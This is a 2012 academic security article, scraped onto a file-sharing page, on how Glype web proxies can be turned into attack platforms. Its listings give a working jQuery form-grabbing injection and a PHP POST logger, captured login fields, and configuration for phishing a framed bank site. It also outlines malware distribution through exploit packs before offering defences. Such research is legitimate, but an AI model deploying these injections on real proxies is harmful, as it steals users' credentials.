UiPath Platform: The Backend Engine Powering Your Automation - Session 1UiPath Platform: The Backend Engine Powering Your Automation - Session 1
UiPath Platform: The Backend Engine Powering Your Automation - Session 1
 
20230104 - machine vision
20230104 - machine vision20230104 - machine vision
20230104 - machine vision
 
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
activity_diagram_combine_v4_20190827.pdfactivity_diagram_combine_v4_20190827.pdf
 
Machine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdfMachine Learning Model Validation (Aijun Zhang 2024).pdf
Machine Learning Model Validation (Aijun Zhang 2024).pdf
 
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve DecarbonizationUsing IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
Using IESVE for Loads, Sizing and Heat Pump Modeling to Achieve Decarbonization
 
UiPath Studio Web workshop series - Day 5
UiPath Studio Web workshop series - Day 5UiPath Studio Web workshop series - Day 5
UiPath Studio Web workshop series - Day 5
 
Introduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptxIntroduction to Matsuo Laboratory (ENG).pptx
Introduction to Matsuo Laboratory (ENG).pptx
 
VoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBXVoIP Service and Marketing using Odoo and Asterisk PBX
VoIP Service and Marketing using Odoo and Asterisk PBX
 
Cybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptxCybersecurity Workshop #1.pptx
Cybersecurity Workshop #1.pptx
 
UiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation DevelopersUiPath Community: AI for UiPath Automation Developers
UiPath Community: AI for UiPath Automation Developers
 
The Kubernetes Gateway API and its role in Cloud Native API Management
The Kubernetes Gateway API and its role in Cloud Native API ManagementThe Kubernetes Gateway API and its role in Cloud Native API Management
The Kubernetes Gateway API and its role in Cloud Native API Management
 
Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024Artificial Intelligence & SEO Trends for 2024
Artificial Intelligence & SEO Trends for 2024
 
How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?How Accurate are Carbon Emissions Projections?
How Accurate are Carbon Emissions Projections?
 
Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1Secure your environment with UiPath and CyberArk technologies - Session 1
Secure your environment with UiPath and CyberArk technologies - Session 1
 
Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024Salesforce Miami User Group Event - 1st Quarter 2024
Salesforce Miami User Group Event - 1st Quarter 2024
 
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdfUiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
UiPath Solutions Management Preview - Northern CA Chapter - March 22.pdf
 
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPAAnypoint Code Builder , Google Pub sub connector and MuleSoft RPA
Anypoint Code Builder , Google Pub sub connector and MuleSoft RPA
 

Abusing Glype Proxies - Attacks, Exploits and Defences

  • 1. FEATURE 8 Network Security December 2012 Organisations also need to educate their end users, as security is everyone’s concern. Many data leaks caused by insiders are due to careless, not malicious users. Ensure that employees understand security policies and take the proper security precautions. About the Author Bill Morrow is executive chairman and CEO at Quarri Technologies. He has more than 20 years of business foundation and leadership experience. In 2006, he founded CSIdentity Corporation, a wholesale provider of ID theft services across the globe, and served as CEO and chairman of the board into 2011. Previously he founded and served as vice-chairman of the board, director and CEO of Grande Communications. Morrow was the 2010 Ernst & Young Entrepreneur of the Year Award winner for Central Texas. References 1. Camp, Cameron. ‘The BYOD security challenge: How scary is the iPad, tablet, smartphone surge?’ ESET Threat Blog, 28 Feb 2012. Accessed Nov 2012. http://blog.eset.com/2012/02/28/ sizing-up-the-byod-security-challenge. 2. Wilson, Jeff. ‘Enterprises rate mobile device security vendors, reveal BYOD concerns’. Infonetics. 8 Mar 2012. Accessed Nov 2012. www.infonetics.com/pr/2012/ Enterprise-Mobile-Security- Strategies-Survey-Highlights.asp. 3. ‘2011 Internet Security Threat Report’. Symantec, April 2012. Accessed Nov 2012. www.symantec. com/threatreport. 4. ‘Mobile Device Vulnerability Management Flagged as Top Concern for Security Professionals in 2012’. Tenable Network Security, 2 Apr 2012. Accessed Nov 2012. www.tenable.com/news-events/ press-releases/2012-mobile-device- vulnerability-management-flagged-as- top-concern-for-se. 5. ‘2012 Confidential Documents at Risk Study’. Ponemon Institute, 26 Jul 2012. Accessed Nov 2012. http:// info.watchdox.com/Ponemon.html. 6. ‘Survey finds nearly half of consumers fail to upgrade software regularly and one quarter of consumers don’t know why to update software’. Skype, Norton by Symantec and Tom Tom, 23 Jul 2012. Accessed Nov 2012. http:// about.skype.com/press/2012/07/ Abusing Glype proxies: attacks, exploits and defences Glype is an open source proxy written in PHP and is freely available for personal use. It can also be licensed for commercial use, and is available as an add-on for Firefox as Proxilla.2 The basic idea of a web proxy is to download requested web pages, modify them according to a set of proxy rules, and then forward them to the user. By standing between the user and the rest of the web, the proxy can provide some anonymity to the user in addition to other services. Proxies can also be transformed into attack platforms for exploitation. For example, misconfigured proxies can be exploited by an attacker to steal sensitive information from users. Our study focuses on various attacks and the distribution of malware using Glype proxies. We present a model of the approach used by attackers to transform a Glype proxy into an attack toolkit for spreading infections. For our experiments, we have used Glype versions 1.1 and 1.4. We will present details about the features of Glype proxies that help attackers, and we will conclude by proposing countermeasures. Background A number of studies have been conducted in the past regarding the use of public proxies as attack platforms. SANS, a co-operative research and security institution, conducted two studies on the integrity of public proxies. The first, by Powers, discussed the possibility of malware in public proxy lists.3 The study focused on tracking the Koobface malware that used open ports for incoming connections and hid operations behind proxies through proxy lists. The other, by Brozycki, presented techniques for detecting proxies that provide anonymous access and proposed methods to defend against them using blacklisting and active monitoring.4 A number of IDS rules were proposed by Brozycki to prevent users from accessing blocked content inside a network. In this paper, we do not cover network-level anonymisers such as VPNs and TOR. The concept of this paper revolves around web-based anonymity using server-side web proxies. The primary difference between the TOR network and web-based proxies is that TOR implements multi-tier (multi-layer) Aditya K Sood, Michigan State University, Peter Greko, SecNiche Security Labs, and Richard J Enbody, Michigan State University Proxies play a critical privacy role because these are widely used for anonymous surfing and identity cloaking on the Internet. In addition, proxies also assist in traffic filtering, traffic management, log auditing, access policies and surfing restricted sites. There are several types of proxies available, but the Glype HTTP proxy is used extensively.1
  • 2. FEATURE December 2012 Network Security 9 anonymity before forwarding the traffic to the destination, whereas web proxies have a two-tier (single-server) architecture.5 In other words, the difference is in the implementation of relays and routing the traffic between endpoints. Huang et al discussed cache-poisoning attacks in transparent proxies using socket Application Programming Interfaces (APIs) in Java and Flash.6 In cache poisoning attacks, transparent proxies are exploited that are configured to route traffic based on the HTTP ‘Host:’ parameter while caching at the same time. An attacker poisons the Host: header in the cache using a malicious Flash or Java file that downloads the policy file from the attacker’s server. Cache poisoning attacks are quite common in network proxies. The Swiss Security Team discussed the inability of Glype proxies to hide the user’s identity entirely.7 Its study showed how the misconfiguration in Glype proxies can lead to the disclosure of sensitive information. Dissecting Glype The primary purpose of the Glype proxy is to provide the capability of anonymous surfing. However, attackers can also transform a Glype proxy into a malware infection platform. To understand the attacks, it is important to understand the characteristics of Glype proxies. To provide proxy services each URL and each page’s internal links are encoded using a simple, base-64 encoding. For example, consider this URL: hxxp://[Glype_proxy_url]/proxy/browse. php?u=Oi8vc2NyaXB0bWFmaWEub3Jn Lw%3D%3D&b=13&f=norefer This contains the string ‘Oi8vc2NyaXB0bWFmaWEub3JnLw’. A simple base-64 decoding of this string results in ‘://scriptmafia.org’ which shows that the URL decoding process is simple. Care is needed to handle special characters because the Glype proxy follows the PHP-based encoding/ decoding mechanism in which special characters present in variable names are encoded to maintain compatibility with registered global variables. The Glype proxy can be extended using plugins. For example, popular websites such as Facebook, Twitter and Gmail have separate plug-ins for the Glype proxy. Web page processing is handled using Glype’s ‘process.php’ page. For simplicity, the Glype proxy injects JavaScript code in web pages to avoid sending requests to the process.php page using HTTP POST requests. The Glype proxy uses HTTP headers such as ‘Referrer:’ and ‘Location:’ for redirection purposes. Google can be used to search for misconfigured Glype proxies. By default, Glype logs its activities with a log folder in the /tmp directory (/tmp/log). Knowing the location of the log allows a malicious user to easily craft efficient Google queries with Google dorks to search for misconfigured proxies. The Glype proxy has default credentials {username=admin, password=admin}. The password is hardcoded as an MD5 hash, but is susceptible to brute force attack. For secure configurations, the hash should be replaced. In addition, in its default configuration, the Glype proxy uses no cache. Listing 1 shows the implementation of the cache module in Glype proxy. However, it is still possible to configure Glype proxy to send some cache headers using session_cache_ limiter(‘private_no_expire’). Glype proxies suffer from several design flaws that are exploited by attackers. Some of the issues that make Glype proxies an effective hacker tool are discussed below. Logging mechanism By design, the Glype proxy is supposed to provide anonymity for its users. Unfortunately, weaknesses exist that can leak information about a user’s identity. Since Glype is written in PHP, an attacker can perform several modifications to make the Glype proxy a tool for successful execution of attacks. There are different kinds of information that attackers can easily steal by misconfiguring the parameters of the Glype proxy and writing an advanced plugin for capturing data. Listing 2 shows the type of information logged when the user surfs a website through a Glype proxy. It basically captures GET requests and provides information about IP addresses visited. Glype proxies also allow attackers to extract cookies – a potentially valuable Listing 1: Cache module in the Glype proxy # Send no-cache headers. function sendNoCache() { header( ‘Cache-Control: no-store, no-cache, must-revalidate’ ); header( ‘Cache-Control: post-check=0, pre-check=0’, false ); header( ‘Pragma: no-cache’ ); } Listing 2: Logs in Glype Proxy 68.37.xxx.xxx, 07/Mar/2012:21:15:54 -0500, http://m.facebook.com 68.37.xxx.xxx, 07/Mar/2012:21:15:55 -0500, http://static.ak.fbcdn.net/rsrc.php/v1/yv/r/7L0JGfufUnz.png 68.37.xxx.xxx, 07/Mar/2012:21:16:14 -0500, https://m.facebook.com/login.php?m=m&refsrc=http%3A%2F%2Fm. facebook.com%2F&refid=8 68.37.xxx.xxx, 07/Mar/2012:21:16:15 -0500, https://s-static.ak.facebook.com/rsrc.php/v1/yz/r/aKhO2tw3FnO.png 68.37.xxx.xxx, 07/Mar/2012:21:17:03 -0500, http://m.facebook.com/home.php?refsrc=http%3A%2F%2Fm.facebook. com%2F&refid=9&m_sess=1h7Hs5-j9bwiFsu&_rdr
  • 3. FEATURE 10 Network Security December 2012 source of personal information. The Glype proxy only provides an option for deleting cookies on the client side, not on the server side. To provide anonymity the cookies should be deleted completely on both sides, but this cannot happen. Listing 3 shows the extracted cookies of a user who visited Facebook. In an attempt to provide anonymity, a Glype proxy does not log POST requests. However, an attacker can write a plugin to grab all POST requests. We developed such a plugin, which we demonstrate in the next section. IP banning and restriction Glype proxies provide impressive functionality to restrict IP addresses using the BlockScript web software.8 It was designed to enable administrators to restrict HTTP requests from unwanted domains. However, this functionality is also useful for launching targeted attacks in which attackers target a specific set of IP addresses and restrict others. Also, this property can subvert the generic analysis method of testing servers remotely. A Glype proxy uses an IP banning module as shown in listing 4. In the code in listing 4, a Glype proxy looks for IP addresses that are restricted or blacklisted to start the verification check. If an IP address is found in the databases, the Glype proxy returns a ‘403 Forbidden’ response to the user. To make it more malicious, attackers can serve malicious web pages showing the IP-banned message. In this way, a user is not able to surf anonymously and still gets infected. There are many modifications that can be made in the code for playing around with IP address restrictions. Listing 3: Cookies collected by Glype Proxy #HttpOnly_.facebook.com TRUE / FALSE 1394475951 datr V4tbT71wsBGdD8j2XZgUBDlJ .facebook.com TRUE / FALSE 0 lsd 1W12c #HttpOnly_.facebook.com TRUE / FALSE 0 m_ts 1331403951 .facebook.com TRUE / FALSE 1 reg_ext_ref deleted .facebook.com TRUE / FALSE 0 reg_fb_gate http%3A%2F%2Fm.facebook.com%2F .facebook.com TRUE / FALSE 0 reg_fb_ref http%3A%2F%2Fm.facebook. com%2F%2522http%3A%2F%2Fstatic.ak.fbcdn.net%2Frsrc.php%2Fv1%2Fyr%2Fr%2FxgDlevwA9Y5.png%2522 Listing 4: IP Banning Module if ( empty($_SESSION[‘ip_verified’]) || $_SESSION[‘ip_verified’] != $_ SERVER[‘REMOTE_ADDR’] ) { if (!$CONFIG[‘enable_blockscript’]) { # Current IP matches a banned IP? true/false $banned = false; # Examine all IP bans foreach ( $CONFIG[‘ip_bans’] as $ip ) { # Is this a range or single? if ( ($pos = strspn($ip, ‘0123456789.’)) == strlen($ip) ) { # Just a single IP so check for a match if ( $_SERVER[‘REMOTE_ADDR’] == $ip ) { # Flag the match and break out the loop $banned = true; break; } # And try next IP continue; } // – – – – – Redacted – – – – – // # Is the IP address banned? if ( $banned ) { # Send a Forbidden header header(‘HTTP/1.1 403 Forbidden’, true, 403); # Print the banned page and exit! echo loadTemplate(‘banned.page’); exit;} # Still here? Must be OK so save IP in session to prevent rechecking next time $_SESSION[‘ip_verified’] = $_SERVER[‘REMOTE_ADDR’];
  • 4. FEATURE December 2012 Network Security 11 Threat model Examining the threat model allows us to understand the role of the various actors involved and how attackers exploit the integrity of users by conducting attacks. The model basically covers the threats associated with end users and administrators. Since we’re concerned here with the Glype proxy, the attacks are modelled around the Man-in-the- Middle (MitM) paradigm. during our research, it has been noticed that Glype proxies are configured in a very insecure way – for example, using default or weak passwords. This misconfiguration allows attackers to successfully compromise the proxy software using brute-force attacks. The primary risk is that attackers now exploit third-party resources – including infrastructure, traffic density, etc – to exploit users at a large scale. Glype is a server-side proxy and compromising it has serious implications. the Glype proxy provides anonymity on the web. The users are susceptible to a wide variety of attacks. The primary target of the attacker is to force the users to surf Internet resources through the Glype proxy. The users’ surfing habits and trust play a significant role in the execution of insidious attacks. Information stealing, phishing, Cross- Frame Scripting (XFS) and so on are some of the attacks that can be triggered easily using Glype proxy. Since the Glype proxy is open source, the code can be modified using inherent features that make it a more powerful weapon. In the next section, we discuss some of the attacks using custom plugins. Remember, Glype is not a client-side proxy but it infects and modifies the proxied web pages served to the users. Launching attacks using Glype Attacks triggered using Glype proxies are based on the concept of the Man- in-the-Middle (MitM) paradigm. The MitM agent reads and writes the traffic between two end points on the network. It is quite easy to equate the Glype proxy with an MitM agent because the traffic originating from the infected machine is routed through the Glype proxy interface before it is processed by the web server. The attacker controls and administers the Glype proxy interface and can easily manipulate the requests and responses flowing between client’s browser and the web server. As a result, the user is served with illegitimate and malicious content that subverts the normal operations of browsers. To support this theory, our team conducted several sets of tests to understand the impact of Glype proxy infection at a large scale. Data exfiltration – form grabbing Data exfiltration attacks are conducted to steal sensitive information from infected machines on the Internet. It is easy to exfiltrate data from users who use Glype proxies. These proxies provide a configuration file for managing the current run state and it appears possible for an attacker to infect all the proxified web pages with illegitimate content. To test that theory, we conducted an experiment to understand the impact of infecting proxied webpages. We noticed that a Glype proxy provides certain configuration parameters that can be used to inject malicious content that gets rendered in all the web pages that are proxied. This capability can be devastating. We implemented a small program using jQuery to grab all the POST requests. Listing 5 provides a different set of scripts that we used in our tests which are described as follows: is used to serialise the data present in the forms. This code serialises the data entered by the users in input boxes in the forms and submits the data to the malicious domain. This code is passed as a parameter to the ‘footer_include’ configuration, and so injects this code at the bottom of all the proxied webpages. that it does not send the form data to the server but rather triggers an alert notification. This code is used for validating successful insertion of scripts in the web pages. used to handle the incoming data and storing it in the log file for analysis. By using the code discussed in listing 5, it is possible to log all the POST requests sent by the user’s browser through the Glype proxy’s interface. The POST data can be logged on the server side as shown in listing 6. Figure 1 shows the successful execution of a script inserted in the proxied web page. This shows that it is very easy to inject scripts automatically by tweaking configuration parameters in the Glype proxy. Cross-frame scripting and phishing Cross-Frame Scripting (XFS) is an advanced attack in which an attacker exploits the inability of web pages to prevent themselves from being framed in a web browser. An attacker loads the target website in an HTML iframe or frame and forces the JavaScript from the primary domain to interact with the target website that is loaded in the frame. XFS allows the attackers to force the legitimate user to perform rogue operations without their knowledge. XFS can be launched to trigger phishing attacks. To counter this attack many websites are using anti XFS code.9 HTML 5 has the built-in attribute ‘sandbox’ defined as a part of an iframe tag that can be used to bypass the restrictions, as described here.10 Despite this fact, a Glype proxy has the ability to rewrite URLs while proxying the content of the domain. A Glype proxy caches the URL and then applies the proxify function to rewrite it. To make it legitimate, an attacker can configure the Glype proxy in such a way that phishing attacks look more original by subverting the XFS protections. We conducted an experiment using Glype proxy version 1.1 and made configuration changes in the settings.php file in order to tweak the Glype proxy to execute a phishing attack. We also modified the code to execute advanced attacks to understand the potential risk associated with a Glype proxy. Listing 7 shows the configuration we used in the demonstration attack code.
  • 5. FEATURE 12 Network Security December 2012 In our code, Secure Socket Layer (SSL) protocol warnings are turned off. This modification allows the Glype proxy to quash all the SSL-based warnings. We also enabled hotlinking, the process of directly loading content from a third-party domain. In a Glype proxy, hotlinking allows the attacker to force the user to visit an XFS web page directly. We enabled caching for faster execution. Caching of files such as CSS, images, and so on forces the browser to store the content locally and use it directly without sending requests to the web server. This way, the attacker can speed up the loading of web pages in the client’s browser. Finally, we allowed JavaScript for communication with different objects on the web page. JavaScript is an essential component of many websites and applications. For example, banking websites use JavaScript for communicating with different objects in a dynamic manner. In addition, the attacker benefits from this because it allows the attacker to execute any arbitrary script in the context of a proxied website. We tested this configuration and found that it is possible to use XFS for conducting a phishing attack as shown in Figure 2. Our experiment showed that sophisticated XFS protections can be circumvented with the help of a Glype proxy. In Figure 2, a legitimate Bank of America website is framed inside a Glype proxy interface without any warnings. It means an attacker can inject scripts as discussed earlier to interact with various objects on the web page. Typically, the user believes that he/she is surfing the bank website through a legitimate proxy but in reality all the information can be easily captured from the user’s session. “It is possible to embed a single exploit code directly in the Glype proxy web page. This process actually transforms the Glype proxy into an attack toolkit” In the above layout, the URL points to the domain where the Glype proxy is hosted. As hotlinking is allowed and the Glype proxy does not present any message, the attacker can also use the Glype proxy URL (pointed to bank domain) and embed it in the phishing emails for distributing among large number of users. When a user clicks the malicious link, he/she is redirected towards the Glype proxy interface that automatically loads the legitimate bank website. An attacker can also install a Listing 5: Injecting Code in Glype Proxy Parameter // – – – – Code (1) – – – – // $CONFIG[‘footer_include’] = ‘<script src=“http://ajax.googleapis.com/ajax/ libs/jquery/1.5/jquery.min.js”></script> <script> $(’form’).submit( function() { var yup = $(’form’).serialize(); $.post(“logit.php”, yup,function (data){}); }); </script>‘; // – – – – Code (2) – – – – // $CONFIG[‘footer_include’] = ‘<script src=“http://ajax.googleapis.com/ajax/ libs/jquery/1.5/jquery.min.js”></script> <script> $(’form’).submit( function() { alert( $(’form’).serialize()); }); </script>‘; // – – – – Code (3) – – – – // <?php $file = fopen(“postlog.txt”, ‘a’); foreach( $_POST as $key => $value ) { fwrite($file, $key.”:”.$value.”n”); } fclose($file); ?> Listing 6: Extracted Data from HTTP POST (FORM Submit) Request lsd: post_form_id:7eb4ce3be4f996e756e1f54ac474d578 charset_test:€,´,€,´,æ°´,Д,Є version:1 ajax:1 width:1280 pxr:1 gps:1 email:FACEBOOK_USER@facebook.com pass:FACEBOOK_PASSWORD m_ts:1332258635 li:MqdoT8wNn91Ak0OT4rUUGUHg
  • 6. FEATURE December 2012 Network Security 13 Glype proxy on familiar-looking domain names to make the phishing attack look more appealing, and hence more effective. Malware distribution Glype proxies can be used for attacking corporate networks to spread infections. Considering the characteristics of a Glype proxy, it is possible for attackers to create an embedded toolkit using a Glype proxy for distributing malware that is highly targeted. The complete model is presented below. Hosting Glype proxy: to begin, the attacker hosts the Glype proxy tool on a compromised domain. As described earlier, web searching can reveal a number of misconfigured Glype proxies on the Internet. It is not difficult for an attacker to hack a misconfigured proxy and use it for malicious purposes. Once a proxy is successfully installed on the compromised domain, the attacker configures it for the attack using scenarios described in earlier sections. There are two primary configuration checks that an attacker wants to implement: attacker to keep track of the activity happening through the proxy. For example, an attacker can install a custom POST logger plugin for stealing data in HTTP POST requests. allows the attacker to restrict certain IP addresses from accessing the Glype proxy. This functionality is useful in targeted infections. Embedding a browser exploit pack in Glype: after successful installation of a Glype proxy, the next step is to embed an iframe having a URL pointing to a Browser Exploit Pack (BEP).11 The iframe can be hidden or obfuscated depending on the requirements. A BEP is a framework that has a number of exploits bundled together. A BEP begins by fingerprinting the user’s browser environment and then serves an appropriate exploit. BlackHole, Phoenix and Crimepack are some of the BEPs that are frequently used for infections. It is possible to embed a single exploit code directly in the Glype proxy web page. This process actually transforms the Glype proxy into an attack toolkit. As discussed earlier, malicious code can be injected dynamically in all the proxied web pages for stealthy infections. The main motive behind this process is to exploit the user’s browser when a proxied web page is opened. Additionally, many proxy users Figure 1: Stealing credentials by injecting code in a Glype proxy. Listing 7: Configuration Parameters Required for Bypassing XFS and Executing Phishing // Configure SSL warnings $CONFIG[‘ssl_warning’] = false; // Managing Hotlinking $CONFIG[‘stop_hotlinking’] = false; // Specifying the target domain for hot linking $CONFIG[‘hotlink_domains’] = array(‘www.bankofamerica.com’); // Storing cookies on the server $CONFIG[‘cookies_on_server’] = true; // Setting cookies path $CONFIG[‘cookies_folder’] = $CONFIG[‘tmp_dir’] . ‘cookies/’; // Enable logging $CONFIG[‘enable_logging’] = true; Figure 2: Phished web page in a Glype proxy.
  • 7. FEATURE 14 Network Security December 2012 believe that surfing online anonymously provides security and neglect to verify the integrity of the Glype proxy. An attacker can exploit this trust. Embedding a malicious link pointing to a BEP is not a hard task in the Glype proxy. Advertising Glype proxy: once the Glype proxy-based attack is set up, the next step is to start advertising the Glype proxy. Advertising is usually done to collect revenue based on hits, but in this case the prime motivation for an attacker is to get traffic so that the infectious code can be distributed. However, advertising can play a critical role in the success of attacks. Several methods are used by attackers to advertise their infected Glype proxies: to advertise their infected Glype proxy. Public proxy lists are one of the most widely accepted methods for advertising Glype proxies. For example, paying a few dollars allows an infected Glype proxy to be numbered in the top-ten proxies, which is a good deal from the attacker’s perspective. This approach can increase traffic on the infected Glype proxy. Figure 3 shows how a proxy can be advertised. attacks to distribute the URL pointing to their infected Glype proxy. Phishing attacks have been effective for exploiting users’ trust and belief in the security of proxies. proxy on social networks, message boards and advertising links. Due to their popularity and trustworthiness, social networks have become the preferred choice of attackers for distributing malware. It is easy and profitable. On completion of this process, attackers have successfully distributed information about their infected Glype proxy to a variety of outlets on the Internet. After this, the attacker waits for the infections to trigger. Post-exploitation: once the infected proxy site has been visited, there are two vectors of attack. If a user is to be directed to a malicious website loaded with malware, the BEP there installs malware on a user’s computer and the computer is owned by the attacker. If the Glype is being used to gather information, the attacker starts mining the logs to track the IP addresses and extract personal information, possibly including account credentials. Information collected from Glype proxies can also be very useful to design other attack vectors. For example, information specific to an individual can be collected for a later, more effective spear-phishing attack. This attack model is typically part of a distributed attack and can be very effective in spreading infections widely. Proactive steps There are several steps that users can take when dealing with Glype proxies for anonymous surfing on the Internet: services for surfing websites that require critical information, such as financial credentials, to be delivered to the server. Users should be aware that their data is being transferred through a public proxy. A classic example would be employees circumventing restrictions put in place by an organisation they work for – such circumvention could open a big hole. legitimate and authentic proxy services on the Internet. However, it is still not advised to use the services directly. A user should verify the integrity of a proxy provider to check whether it is a legitimate service provider or a fraudulent entity. for internal use, it should be ensured that the Glype proxy is configured in a secure way. Default credentials must be changed to stronger ones. Log files should not be publicly accessible, which can be achieved by configuring the settings.php and .htaccess files on the server. good surfing habits on the Internet. For example, they should always think twice before clicking a link that is embedded in an email. Additionally, they should be suspicious of attachments and verify them before downloading.Theseoperationalhabits depend on the security knowledge of the user and show the importance of user education. Organisations should have a robust security training model to educate users about the latest web attack trends and appropriate secure behaviour. The steps discussed above can be effective in reducing the infection rate and preserving the integrity of users. Conclusion Glype proxies have been increasing in popularity over the past few years. Generally, Glype proxies assist in maintaining a user’s integrity and privacy. However, they can also be used as an attack platform because of some inherent design flaws. First, insecure configuration of Glype proxies can result in the stealing of information. Second, attackers can extend the Glype proxy code to conduct Figure 3: Advertising proxies on the Internet.
  • 8. FEATURE December 2012 Network Security 15 web-based attacks by tricking a user to visit a malicious domain or routing the web traffic through Glype proxies. Finally, security greatly depends on users’ ability to make secure decisions when on the Internet. Secure behaviour can help thwart a number of attack scenarios. Be vigilant and surf securely. About the authors Aditya K Sood is a senior security practitioner and PhD candidate at Michigan State University. He has already worked in the security domain for Armorize, COSEINC and KPMG. He is also a founder of SecNiche Security, an independent security research lab. He has been an active speaker at industry conferences such as DEFCON, HackInTheBox, LayerOne, Source, RSA, BruCon, ToorCon, HackerHalted, TRISC, EuSecwest, XCON, Troopers, OWASP AppSec, US-CERT GFIRST and many others. He has authored several papers for various publishers including IEEE, Elsevier, Crosstalk, Virus Bulletin, ISACA, ISSA and HITB. Peter Greko is a security researcher at SecNiche Security Labs where he deals with cyber-security issues. Previously he has worked in the cyber-security divisions of Sypris and Citigroup. He has spoken at several conferences, including HackerHalted, AppSec DC, HOPE, Swiss CyberStorm and local OWASP and ISSA chapter meetings. Richard J Enbody, PhD is associate professor in the Department of Computer Science and Engineering at Michigan State University (US) where he joined the faculty in 1987. He earned his PhD at the University of Minnesota (1987) and his BA at Carleton College (1976). His research interests include computer security, computer architecture, web-based distance education, and CS1 education. Enbody has written a CS1 text using Python: ‘The Practice of Computing Using Python, Second Edition’, published by Addison- Wesley 2012. References 1. Glype proxy. Accessed Nov 2012. www.glype.com. 2. Proxilla Glype Proxy Client – Mozilla Firefox Add-On. Accessed Nov 2012. https://addons.mozilla.org/en-US/ firefox/addon/proxilla/. 3. Powers, JL. ‘Tracking Malware with Public Proxy Lists’. SANS Reading Room. Accessed Nov 2012. www. sans.org/reading_room/whitepapers/ malicious/tracking-malware-public- proxy-lists_33604. 4. Brozycki, Z. ‘Detecting and Preventing Anonymous Proxy Usage’. SANS Reading Room. Accessed Nov 2012. www.sans.org/reading_room/ whitepapers/detection/detecting- preventing-anonymous-proxy- usage_32943. 5. ‘TOR (The Onion Router)’. University of Michigan. Accessed Nov 2012. http://webapps.lsa.umich.edu/ lsait/admin/TOR%20Routing%20 Infomation%20.pdf. 6. Huang, L; Chen, EY; Barth, A; Rescorla, E; Jackson, C. ‘Talking to Yourself for Fun and Profit’. Accessed Nov 2012. www.w2spconf.com/2011/ papers/websocket.pdf. 7. ‘When You Think You Surf Anonymously But You Don’t’. Swiss Security Blog, 26 Apr 2010. Accessed Nov 2012. www.abuse.ch/?p=2534. 8. BlockScript, home page. Accessed Nov 2012. www.blockscript.com. 9. Rydstedt, G; Bursztein, E; Boneh, D; Jackson, C. ‘Busting Frame Busting: a Study of Clickjacking Vulnerabilities on Popular Sites’. Stanford SecLab, 20 Jul 2010. Accessed Nov 2012. http://seclab.stanford.edu/websec/ framebusting/framebust.pdf. 10.Sood, AK; Enbody, RJ. ‘Frametrapping the framebusting defence’. Network Security, October 2011. Accessed Nov 2012. www.sciencedirect.com/science/ article/pii/S1353485811701052. 11.Sood, AK; Enbody, RJ. ‘Browser Exploit Packs – Exploitation Tactics’. ToorCon Security Conference, October 2011, San Diego. Accessed Nov 2012. http://secniche.blogspot. com/2011/06/toorcon-seattle-2011- browser-exploit.html. Virtual jihad: how real is the threat? Steve Gold One of the less well reported aspects of cybercrime – and one that poses a very real threat to the integrity of companies’ IT resources, as well as that of Western governments – is the issue of cyber-terrorism. According to Dancho Danchev, an Amsterdam-based security blogger with Webroot, and an Internet/ security researcher since the mid-1990s, the reason for this is largely because of a lack of understanding of what cyber-jihadism is all about. Coupled with a lack of understanding about the teachings of the Koran and Islamic faith, this has resulted in the topic becoming something of a no-go area for Western security researchers, despite the fact that the more extremist elements in Islamic countries are increasingly using relatively advanced technology in the shape of Steve Gold, freelance journalist There is widespread concern about the ways in which terrorist organisations – and particularly jihadist movements – may be using the Internet to organise and execute acts of terror. But is the threat real, or is it a case of an IT security industry generating fear, uncertainty and doubt in an attempt to instil fear into every Internet user?